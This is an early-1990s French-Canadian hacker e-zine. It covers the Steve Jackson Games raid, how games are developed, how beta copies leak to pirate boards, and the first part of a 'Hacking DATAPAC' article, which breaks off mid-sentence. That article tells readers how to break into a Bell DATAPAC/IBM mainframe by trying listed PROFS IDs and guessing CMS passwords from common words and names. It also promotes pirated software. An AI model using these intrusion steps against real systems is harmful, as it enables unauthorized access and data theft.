"High Tech, Low Life" domin‚ par l'anarchie, les gangs, et le
piratage informatique (Lire les autres article de l0gRuS! … ce
sujet)... Ce suppl‚ment a ‚t‚ ‚crit par The Mentor, afin d'offrir
un univers d‚cent aux autres hackers, qui pourrait y jouer sans
s'‚touffer de rire (Comme avec bon nombre de JdR CyberPunks, que je
ne nommerai pas ici).

Lorsque Steve Jackson … ‚t‚ chercher son manuscrit aux bureaux des
SS, avec son avocat, on lui … r‚pliqu‚ que GURPS CyberPunk ‚tait un
"Manuel au crime par ordinateur"... Steve Jackson … r‚pliqu‚:

-" Mais ce n'est que de la Science-Fiction! "

Et vous savez ce que plusieurs agents des SS lui ont r‚pondu???

-" Non, c'est la r‚alit‚... "

Mmmm.. Le genre de phrase qui laisse … r‚fl‚chir, non? Surtout
lorsque durant le bust:

-Personne n'a ‚t‚ arrˆt‚..

-Personne ne fut accus‚ d'aucun crime...

-Aucune poursuite ne fut entam‚e...

-Tout le mat‚riel saisi … ‚t‚ gard‚ comme "preuves" d'un crime
jamais sp‚cifi‚...

-Le mandat de perquisition n'‚tait PAS SIGN...

Ah! Je vous vois! Vous vous demandez tous :" Mais qu'y a-t'il
dans ce fameux GURPS CyberPunk??".. Ha! Vous verrez bien dans le
prochain num‚ro, avec la suite de l'histoire du bust de STG! En
attendant, qu'Arioch vous protŠge de Bell, fellow hackers..

l0gRuS!

Bibliographie:

THE HACKER CRACKDOWN:
LAW AND DISORDER ON THE ELECTRONIC FRONTIER
by Bruce Sterling
Bantam Books, 1992
Non-fiction, 328 pp., $23 (hard-cover)
ISBN 0-553-08058-X



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

POURQUOI TOUT LE MONDE S'EN PREND A NOUS?!?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



MAMAN, LES PROGRAMMES POUSSENT-ILS SOUS LES CHOUX?


Anatomie d'un warez
par
Blitzkreig

Mais comment font-ils pour avoir les jeux aussi vite? On parle des
babillards pirates, bien s–r, et de la question qu'on nous pose bien
souvent... Une autre question, ‚ternelle litanie du jeune qui d‚bute,
mais qui a du beat: "C'est quoi un programme beta"? En passant, ‡a fait
combien de temps que la copie beta de DOS 6.0 se promŠne sur les babs de
Qu‚bec? Quatre mois?

Alors, chers lecteurs, aprŠs les abeilles et les oiseaux, voici la
petite histoire de la naissance d'un logiciel... Il ‚tait une fois... une
compagnie de soft que nous baptiserons Full-o-Bugz. Un des concepteurs
sous-pay‚s de F.O.B. a soudainement une id‚e tout … fait originale pour
un soft: un nouveau jeu qu'il a d'ores et d‚j… baptis‚ "Revenge Of The
Spotted Ninja Lemmings Streetfighters With A Tendency To Overkill". Notre
g‚nie s'empresse d'aller voir son boss, et aprŠs la pipe habituelle, lui
soumet son id‚e. Le reste, c'est, comme on dit, de l'histoire...
Les "oeuvres d'un seul homme", les programmes construits par un seul
programmeur ne sont plus l‚gion. La race de ces hommes … tout faire
semble s'ˆtre ‚teinte avec le mec (son nom m'‚chappe) qui avait con‡u, en
solitaire, le c‚lŠbre programme OUT OF THIS WORLD. OOTW a d'ailleurs fait
date dans l'histoire des jeux. Vous qui nous lisez, vous avez s–rement
pouss‚ des "ho!" et des "ha!" devant le mouvement fluide des personnages
et la musique excellente de la trame sonore...

Mais tout ‡a, nous l'avons dit, c'est du pass‚. Les compagnies ont
maintenant des "teams" de d‚veloppeurs, quand ils n'ont pas carr‚ment un
AI … leur disposition.

LES A.I.

La plupart des compagnies qui produisent des soft ont, soit un AI, soit
une importante librairie de routines de programmation. Un AI (pour
Artificial Intelligence), c'est en somme un programme (comme le systŠme
SCUMM de LucasFilm) … qui l'on dicte les paramŠtres fonctionnels que
notre projet devrait respecter, et qui CRIT ensuite la programmation
dudit projet. Clarifions encore: supposons que je veuille cr‚er un jeu o—
le personnage, un pirate informatique, tire sur des employ‚s du Bell qui
arrivent par la droite du tableau, avance ou recule … sa guise, et se
saisit, en se penchant, des PBX bonus pour augmenter sa puissance. Je
raconte tout ‡a au AI, dans les formes, et il va m'‚crire les routines en
assembleur, ou dans n'importe quel autre langage de mon choix, pour
construire le jeu. Encore un mot sur les AI, puisque je suis s–r que la
plupart d'entre vous en entendez parler pour la premiŠre fois... Les
meilleurs AI de l'industrie, … ma connaissance (autres que ceux con‡us et
produits "in house", SCUMM again) sont sous licence de Texas Instruments.
J'ai r‚cemment rencontr‚ un repr‚sentant charg‚ de la vente de ce
produit, qui me racontait que les entreprises sont de plus en plus
int‚ress‚es par ce machin. Et pour cause: plus besoin d'analystes-
programmeurs. Supposons que le MinistŠre du Vol du Revenu d‚sire un
programme pour harceler les contribuables, les ‚tapes a suivre ‚taient
auparavant les suivantes:

1) Les cadres concern‚s d‚finissent ensemble les paramŠtres de
fonctionnement du programme ("Me semble que le programme devrait nous
permettre de faire ceci, me semble que le programme devrait nous
permettre de faire cela, etc...).

2) Entrait alors en scŠne l'analyste-programmeur, qui prenait ces
commandes, les instituait en hi‚rarchie logique, et d‚finissait les
paramŠtres de base, pour la programmation en langage-machine.

3) Une ‚quipe de programmeurs utilisait alors le rapport de l'analyste
pour se mettre … la tƒche et r‚aliser le soft.

Le AI, d'aprŠs l'expert de Texas Instruments, va pouvoir remplacer le
programmeur-analyste et la majeure partie des programmeurs: ch“mage,
everyone! L… o— ‡a prenait cinq programmeurs pour r‚aliser un soft, un
seul demeurera, pour peaufiner le produit r‚alis‚ par le AI. Sauf que, …
ma connaissance, les AI ne peuvent pas encore dessiner des backgrounds,
lorsqu'il s'agit de jeux... C'est pourquoi les compagnies ‚quip‚es de
Development Engines (autre nom des AI) font appel … des artistes et
scannent maintenant les dessins ou les rotoscopient, une fois r‚alis‚s.

On en apprend … tous les jours, hein! AprŠs les robots qui fabriquent des
robots, voici des programmes qui fabriquent des programmes...

LES TEAMS

Ceci dit, la plupart des maisons d'‚dition fonctionnent encore avec une
librairie de routines standard, qui doivent tout de mˆme ˆtre r‚vis‚es et
adapt‚es … chaque nouveau produit. Vous qui vous plaignez que Origin
traŒne de la patte avec Strike Commander, ne vous plaignez pas trop,
parce que si on met trop de pression, il vont shipper un produit plein de
bugs (dixit Darklands de Microprose) et il va quand mˆme falloir que vous
courriez aprŠs les dix ou quinze updates qui vont suivre (Falcon 3.0,
anyone?). Mais pourquoi, alors, commencent-ils … ANNONCER un jeu douze
mois avant qu'il ne soit prˆt? Ils cr‚ent de fausses attentes chez le
consommateur, dites-vous. Pas n‚cessairement... Il faut comprendre que la
logistique du placement m‚dia dans un magazine mensuel ou toute autre
forme de publication exige que l'on s'y prenne suffisamment d'avance. Et
les publicistes d'une maison de jeu se basent sur le calendrier de
production du soft pour estimer la date de sortie... Et un calendrier
peut ˆtre souvent mensonger...

ÚÄÄÂÄÄÄÄÄÂÄÄÄÄÂÄÄÄÄÂÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄ¿
³ID³TOTAL³LEFT³DONE³%DONE³TASK DESCRIPTION ³ DUE ³PRED³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³59³12h ³ ³Y ³100% ³Shape draw ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³60³12h ³ ³Y ³100% ³Shape flip ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³61³12h ³ ³Y ³100% ³Shape move ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³62³12h ³ ³Y ³100% ³Shape fill ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³63³12h ³ ³Y ³100% ³Shape shade ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³64³30h ³ ³Y ³100% ³Document editor code ³ 12/6/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³65³18h ³ ³Y ³100% ³Altitude Shift display ³ 8/1/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³66³### ³### ³### ³ 95% ³User interface ³ 8/27/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³67³42h ³ ³Y ³100% ³ Menuing system core ³12/10/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³68³24h ³ ³Y ³100% ³ Menuing revisions ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³69³24h ³ ³Y ³100% ³ Pulldown menu bar ³ 12/5/90³67 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³70³24h ³ ³Y ³100% ³ Area defs for maps/shapes/pal ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³71³12h ³ ³Y ³100% ³ Type data dialog box ³12/13/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³72³12h ³ ³Y ³100% ³ Item data dialog box ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³73³12h ³ ³Y ³100% ³ NPC data dialog box ³ 12/4/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³74³12h ³1h ³ ³ 0% ³ Config file ³ 8/27/91³57 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³75³12h ³ ³Y ³100% ³ Spell book dialog box ³ 5/9/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³76³### ³### ³### ³ 0% ³Schedule creator ³ 8/7/91³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³77³78h ³ ³Y ³100% ³ Schedule entry menu ³12/14/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³78³ 6h ³ ³Y ³100% ³ Select NPC map location ³ 12/3/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³79³18h ³ ³Y ³100% ³ Set game time ³ 8/7/91³21 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³80³18h ³ ³Y ³100% ³ Schedular revisions ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³81³18h ³6h ³ ³ 0% ³Item data set & store ³ 8/9/91³79 ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³82³18h ³ ³Y ³100% ³Type data set & store ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³83³18h ³ ³Y ³100% ³NPC data set & store ³ 12/5/90³ ³
ÃÄÄÅÄÄÄÄÄÅÄÄÄÄÅÄÄÄÄÅÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÅÄÄÄÄ´
³84³12h ³ ³Y ³100% ³Item/terrain select via TM collide³ 5/30/91³ ³
ÀÄÄÁÄÄÄÄÄÁÄÄÄÄÁÄÄÄÄÁÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÙ






La grille que vous avez sous les yeux repr‚sente, je crois, une
infime partie du calendrier de d‚veloppement d'un jeu que vous avez
tous appr‚ci‚, ELVIRA II, The Jaws of Cerberus, par Accolade.
J'avais naguŠre ramass‚ ‡… au d‚tour d'une visite sur un bab U.S...
Je vous la reproduit ici pour vous permettre de saisir, en un seul
coup d'oeil, l'ampleur d'une tƒche de programmation pour un jeu de
cette magnitude. Quelques constatations peuvent d'ores et d‚j…
tir‚es … la vue d'une telle grille:

1) Un jeu informatis‚ n'est pas une oeuvre d'art. Bien au
contraire, chacune des tƒches est r‚partie, pas n‚cessairement
s‚quentiellement, selon le principe du travail … la chaŒne. Le
processus suit un ordre logique, mais, comme vous le voyez, la
tƒche de la ligne 67 a ‚t‚ r‚alis‚e AVANT celle de la ligne 66...

2) Le nombre d'heures qu'exige chaque ‚tape semble avoir ‚t‚
d‚termin‚ plut“t arbitrairement. On met 12 heures partout, sauf l…
o— ‡… devient trop ridicule...

3) Le nombre de personnes travaillant … chacune des ‚tapes du
projet n'est pas d‚termin‚. On se doute bien, pourtant, que ce
n'est pas une seule et mˆme personne qui a r‚alis‚ le soft dans son
entiŠret‚. On se doute aussi que deux ‚tapes peuvent tout de mˆme
ˆtre r‚alis‚es simultan‚ment, puisque celui qui dessine les
personnages n'est probablement pas le mˆme que celui qui fait les
menus. Une r‚partition un tant soit peu logique du travail
exigerait un tel arrangement, sans compter que la polyvalence n'est
pas souvent de mise dans une ‚quipe de production: c'est pas parce
que tu es capable de dessiner les lolos de Elvira que tu es capable
de cr‚er le systŠme pour l'inventaire des objets...

Mais cessons cette analyse l…, voulez-vous, et venons-en … la
conclusion: si ce genre de calendrier constitue l'outil principal
de l'‚quipe de relations publiques pour les aider … bƒtir une
campagne publicitaire, il n'est pas ‚tonnant que les promesses de
celle-ci ne correspondent que rarement aux promesses de celui-l…...
Surtout que, contrairement … l'extrait que nous avons
laborieusement reproduit (vivement un scanner!), les calendriers de
travail fournis aux ‚quipe de P.R. sont g‚n‚ralement vierges, parce
qu'ils sont distribu‚s AU DBUT du projet, et que les heures
EFFECTIVEMENT compl‚t‚es ne sont pas encore entr‚es...

Un dernier mot sur la r‚alisation d'un soft: les versions... J'ai
encore vu, r‚cemment, dans la messagerie d'un bab, pirate je crois,
quelqu'un qui demandait ce qu'‚tait une version BETA... Rien de
plus simple, vraiment: g‚n‚ralement, dŠs que les dessins, les
sketchs des d‚cors et des personnages sont compl‚t‚s, on tire une
copie ALPHA du projet. On va retrouver sur cette copie ALPHA tous
les tableaux de transition non-anim‚s, les backgrounds des scŠnes
o— le h‚ros va se promener, et des plans FIXES du personnage dans
diverses positions et profondeurs de champ. C'est probablement de
la copie ALPHA, d'ailleurs, que le premier d‚mo de Strike Eagle III
a ‚t‚ tir‚...

DŠs que les animations du jeu sont prˆtes, et qu'un prototype
fonctionnel est r‚alis‚, on en tire une copie BETA, qui sera
soumise … toute une s‚rie de testeurs. C'est cette mˆme copie qui
est distribu‚e aux magazines habilit‚s … tester les soft pour des
"first looks". Et c'est toujours cette mˆme copie qui atterrit
g‚n‚ralement sur votre bab pirate favori... et sur votre machine...
Et c'est simple de comprendre pourquoi: une copie BETA circule hors
de l'entreprise qui l'a produit, et elle circule entre des
centaines de mains. Certaines de ces mains en profitent
naturellement pour se graisser au passage en copiant la copie et en
la laissant traŒner sur le bab WHQ d'un groupe de distribution...

Mais autrement, que se passe-t-il avec cette version BETA? Les
testeurs patent‚s la triture, la maltraite, lui font subir les
pires s‚vices, tentent de garrocher les personnages au travers des
armoires, bref, c'est pas la joie! Ces mˆmes testeurs font ensuite
un rapport … la compagnie sur les bugs qu'ils ont d‚cel‚. Si on
peut corriger tout ‡… du premier coup, on passe … la production
proprement dite et … la distribution du soft. Sinon, on produit une
deuxiŠme version pour fins de tests, la copie GAMMA... Mais c'est
rare, avec les retards qui se sont accumul‚s, qu'on en vient …
produire une telle version. La pression des distributeurs et du
public est g‚n‚ralement trŠs grande, et les compagnies vont
pr‚f‚rer tenter r‚parer tous les bugs du premier coup, quitte, nous
en avons parl‚ en introduction, … envoyer dans le champ des copies
qui vont n‚cessiter des dizaines de r‚visions...

Pour mieux comprendre, en d‚finitive, la diff‚rence qui peut
exister entre une copie BETA et un produit fini, tentez de mettre
la main sur la version BETA de D-GENERATION, et comparez-la avec le
produit fini... Vous allez constater une GROSSE diff‚rence...



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

  
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

ON SAUVE EN FRAIS DE RECYCLAGE DEPUIS QUE NPC TRASHE CHEZ NOUS!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



Introduction … l'introduction …...

ÚÚÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿¿¿
ÄÄÄÄÄÄÄÄÄÄÄÄ´³³ Hacking DATAPAC ³³ÃÄÄÄÄÄÄÄÄÄÄÄ
ÀÀÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÙÙ

þ Part One
þ By: Fairy Dst


Hello les mecs! Eh oui, aprŠs une courte absence, je me suis
retrouss‚ les manches pour vous trouver un sujet int‚ressant... du
moins, je le crois! J'ai tout derniŠrement lƒch‚ la drogue (trop de
dommages c‚r‚braux). Ca m'a permis d'exploiter un talent cach‚ que
je poss‚dais, un talent de hacker. Eh oui, je ne me considŠre plus
comme un drogu‚ (en ‚tais-je bien un ?) mais bien un hacker qui
peut s–rement vous en apprendre un peu...


Ca faisait deux semaines que je me creusait la tˆte pour me
trouver un sujet potable, voire mˆme int‚ressant (car je voulais
bien entendu contribuer … ce num‚ro de NpC!). Alors j'explorais les
quelques VRAIS boards o— j'ai accŠs, mais des boards H/P, ca
pousse pas partout! Ainsi, j'ai remarqu‚ que ca brassait un peu
fort con‡ernant les DATAPACs sur The Workshop. Ouaip, ca a l'air
d'int‚resser
pas mal de monde ce systŠme. Alors, j'ai retrouss‚ mes manches de
camisole et
je me suis mis … la recherche d'informations … propos de ce
systŠme, qui est en passant desservi par le Bell lui-mˆme! Ce que
j'ai trouv‚ est fort int‚ressant et vous permettera d'acc‚der … des
informations fort utiles si :

- Vous voulez devenir millionnaires (Sans jokes!)
- Vous avez soif de donn‚es
- Ou bien vous avez tout simplement soif de Hacker (comme
moi d'ailleurs!)....

Pour terminer, je vais peut-ˆtre choquer quelques lecteurs, mais la
suite de mon article se d‚roulera en anglais, pour plaire … tous...



ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ
³ GLOSSARY


DATAPAC
A Nationwide, universally available, packet switching,
shared, data network offered by Telecom Canada (Bell).




DATAPAC 31O1
A service which enables teletypewriter compatible
devices
(eg. Personal Computers) to access the DATAPAC network

via a public dial port.

ID (Identifier)
Your PROFS or CMS account name.

NUI (Network User Identifier)
A method of identifying a user on a DATAPAC 31O1 public
dial port.

PACKET/327O
A software package which allows your Personal computer
to access our IBM host mainframe by emulating an IBM
327O terminal.

PACKET/74
A software package offered by PACKET/PC Inc., which is

the IBM host mainframe interface for PACKET/327O.

VTAM
(Virtual Telecommunication Access Method)
This is an IBM software that handles terminal data and

access on our IBM host mainframe.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
³ ACCESSING THE SYSTEM


First of all you must have PACKET/327O. This is a program
which allows you access to the network by entering a simple
command. Without it, you don't go anywhere. This program is not a
public program. Only authorized persons can get this software. If
you want it, work by yourself. If i get it, you can too. So good
luck! We'll probably u/l a copy of it on a few H/P boards, so...
Ok, once entering the system, you'll see something like this:


Packet 327O Vesion 3.3.2 12/O2/88 (c) Copyright 1987, Packet/Pc Inc
DATAPAC, Canada automatic logon procedure
Resetting your modem...
Dialing XXX-XXX at XXX baud
You have a modem connection at XXX baud
Connecting to DATAPAC
Signing on to the host...


Once you have successfully completed the access process, a
screen is present with the cursor in the ID:____ field. Now, you
need a PROFS and a CMS ID. PROFS ID is very simple to found. Just
try numbers like:


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ PROFS NUMBER ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 00006889 00006978 ³
³ G1GX4WX4 T5YR657Y ³
³ J2E5RT78 WER34ER5 ³
³ GY7T67YT 418YNU8Y ³
³ L9OI08UY B3F56TR6 ³
³ Y1Y54R67 T6Y7RU6R ³
³ 00006883 G9HKJPY4 ³
³ 00006881 00006884 ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

But, to find an CMS password is more difficult. Try simple
words
like: GIGI, DOOM, or try any first name like RICHARD, LINDA, or
anything else...You will be allowed 6 attempts to enter the proper
ID and password before you are disconnected. ANY INVALID ATTEMPTS
TO
SIGN ON ARE RECORDED AND CHECKED BY SECURITY ADMINISTRATORS...


Mais, que peut-on retrouver dans un Network comme ca? Eh bien,
en premier lieu des chiffres d'affaires, des informations
personnelles sur les employ‚s et le PDG, des scoops qui vont sortir
le lendemain dans le Washington Post, des ‚crits in‚dits, etc...
Mais on ne hacke pas seulement pour les infos, mais bien pour le
plaisir de le faire... Donc, je vous laisse le temps de trouver
Packet/327O qui est indispensable pour connecter au Canada. D'ici
l…, je vous tape une belle deuxiŠme partie contenant entre-autre
